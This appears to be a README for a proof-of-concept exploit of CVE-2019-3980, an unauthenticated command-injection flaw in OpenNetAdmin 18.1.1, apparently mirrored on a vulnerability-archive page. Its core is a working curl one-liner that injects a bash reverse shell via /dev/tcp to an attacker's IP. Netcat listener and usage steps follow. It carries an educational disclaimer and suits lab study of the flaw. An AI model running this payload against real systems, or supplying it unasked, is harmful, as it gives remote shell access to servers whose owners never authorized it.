来源

关联漏洞

介绍

# CVE-2019-3980 – OpenNetAdmin 18.1.1 Remote Code Execution

> ⚠️ **Disclaimer**  
This repository is intended **strictly for educational and research purposes only**.  
The information and code provided here can be used in **controlled environments**, such as private lab machines.  
**Unauthorized use of this code against systems you do not own or have explicit permission to test is illegal and unethical.**  
The author is **not responsible** for any misuse or damages caused.

---

## 🔍 About the Vulnerability

A Remote Code Execution vulnerability exists in **OpenNetAdmin 18.1.1** via the `xajax` AJAX request interface.  
The vulnerability arises from improper input sanitization, allowing command injection via a crafted POST request to `/ona/`.  
This exploit leverages the `tooltips` plugin to trigger a reverse shell back to the attacker's listener.

- **CVE ID:** CVE-2019-3980  
- **Exploit-DB ID:** [47691](https://www.exploit-db.com/exploits/47691)  
- **Vulnerable Application:** OpenNetAdmin 18.1.1  
- **Affected Parameter:** `xajaxargs[]`  
- **Impact:** Remote Code Execution  
- **Authentication Required:** ❌ No  
- **Network Access Required:** ✅ Yes  

---

## 📂 Exploit Overview

- **Exploit Type:** Command Injection → Reverse Shell  
- **Exploit Title:** OpenNetAdmin 18.1.1 – Unauthenticated RCE  
- **ExploitDB ID:** 47691  
- **Language:** Bash (via `curl`)  
- **Authentication Required:** ❌ No  

---

## ⚙️ Exploit Code

This customized Bash one-liner sends a POST request to the vulnerable `xajax=window_submit` endpoint with injected reverse shell code.

```bash
#!/bin/bash

curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
```

> 🛠️ **Note:**  
Replace `<YOUR-IP>` and `<YOUR-PORT>` with your Netcat listener IP and port.  
Start your listener using:
```bash
nc -nlvp <PORT>
```

---

## 🎯 Demonstration

### 1. Showing the ONA Web Page and Version

![ONA Web Interface](./img/ona.png)  
> Screenshot of the vulnerable OpenNetAdmin interface and version.

---

## 🚀 Exploit Usage

### 2. Ran the Exploit

```bash
bash shell.sh
```

![Exploit Execution](./img/exploit.png)  
> Screenshot of the script execution triggering the payload.

---

## 🐚 Reverse Shell

### 3. Reverse Shell Obtained

```bash
nc -nlvp <PORT>
```

![Reverse Shell](./img/shell.png)  
> Reverse shell caught as `www-data`.

---

## 📚 References

- [Exploit-DB: CVE-2019-3980](https://www.exploit-db.com/exploits/47691)  
- [NVD CVE Info](https://nvd.nist.gov/vuln/detail/CVE-2019-3980)

---

## 📝 Medium Blog

Check out the detailed walkthrough and theory on my Medium post:  
👉 **[Read the blog on Medium](https://medium.com/@cyberquestor/opennetadmin-18-1-1-remote-code-execution-exploit-db-47691-7c25c9b0ea68)**

文件快照

 [4.0K]  /data/pocs/ffef9744084a44a095d31e7acf0bf9ddc299a43e
├── [4.0K]  img
│   ├── [ 49K]  exploit.png
│   ├── [139K]  ona.png
│   └── [ 76K]  shell.png
└── [3.0K]  README.md

1 directory, 4 files

备注